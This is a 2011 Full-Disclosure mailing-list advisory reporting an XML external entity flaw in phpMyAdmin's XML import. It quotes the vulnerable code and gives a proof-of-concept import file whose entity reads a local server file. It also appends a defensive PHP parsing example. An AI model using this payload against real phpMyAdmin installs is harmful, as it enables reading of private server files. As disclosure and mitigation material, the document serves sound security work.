[Full-disclosure] PhpMyAdmin Arbitrary File Reading
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] PhpMyAdmin Arbitrary File Reading
- From: WooYun <root@xxxxxxxxxx>
- Date: Wed, 2 Nov 2011 15:30:56 +0800
Hi
80sec reported this bug on WooYun. PhpMyAdmin uses the simplexml_load_string
function to read XML from user input; this may be exploited to read files
from the server or network.
In libraries/import/xml.php, there is some code like this:
/**
* Load the XML string
*
* The option LIBXML_COMPACT is specified because it can
* result in increased performance without the need to
* alter the code in any way. It's basically a freebee.
*/
$xml = simplexml_load_string($buffer, "SimpleXMLElement", LIBXML_COMPACT);
unset($buffer);
/**
* The XML was malformed
*/
if ($xml === FALSE) {
So you just need to make an XML like this:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE wooyun [
<!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">
]>
<pma_xml_export version="1.0" xmlns:pma="http://www.phpmyadmin.net/some_doc_url/">
<!--
- Structure schemas
-->
<pma:structure_schemas>
<pma:database name="test" collation="utf8_general_ci"
charset="utf8">
<pma:table name="ts_ad">
&hi80sec;
</pma:table>
</pma:database>
</pma:structure_schemas>
<!--
- Database: 'thinksns'
-->
<database name="thinksns">
<!-- Table ts_ad -->
</database>
</pma_xml_export>
Then import this XML in PhpMyAdmin, and you will get the content you want.
From: http://www.wooyun.org/bugs/wooyun-2010-03185
:)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
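
A defensive counterpart to the simplexml_load_string() call quoted in the message, as an added example that is not part of the original post and not phpMyAdmin's own code: it parses the import buffer without entity substitution or network access and rejects any document that carries a DOCTYPE. The function name load_import_xml() and the two sample documents are assumptions constructed for illustration.

```php
<?php
// Added example: load_import_xml() is a hypothetical helper, not phpMyAdmin code.
function load_import_xml(string $buffer)
{
    if ($buffer === '') {
        return false;
    }
    // PHP < 8.0: switch off libxml's external entity loader while parsing.
    // The call is deprecated from PHP 8.0 on; PHP 8.0 requires libxml2 2.9.0
    // or later, which loads external entities only when LIBXML_NOENT is passed.
    $restore = null;
    if (PHP_VERSION_ID < 80000) {
        $restore = libxml_disable_entity_loader(true);
    }
    $prevErrors = libxml_use_internal_errors(true);

    $dom = new DOMDocument();
    // LIBXML_NONET forbids network access; LIBXML_NOENT and LIBXML_DTDLOAD
    // are deliberately left out so entities are never substituted.
    $ok = $dom->loadXML($buffer, LIBXML_NONET | LIBXML_COMPACT);

    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    if ($restore !== null) {
        libxml_disable_entity_loader($restore);
    }
    if (!$ok) {
        return false; // malformed XML
    }
    // An import file has no reason to carry a DTD: reject any DOCTYPE,
    // which is the only place an entity can be declared.
    foreach ($dom->childNodes as $child) {
        if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) {
            return false;
        }
    }
    return simplexml_import_dom($dom);
}

// Constructed sample inputs: one plain export, one declaring an internal entity.
$plain = '<?xml version="1.0"?><pma_xml_export version="1.0"><database name="test"/></pma_xml_export>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE d [<!ENTITY e "x">]><pma_xml_export>&e;</pma_xml_export>';

var_dump(load_import_xml($plain) instanceof SimpleXMLElement);
var_dump(load_import_xml($withDtd));
```

Checking the parsed DOM for a DOCTYPE node, rather than searching the raw bytes for the string, keeps the check independent of the document's declared encoding.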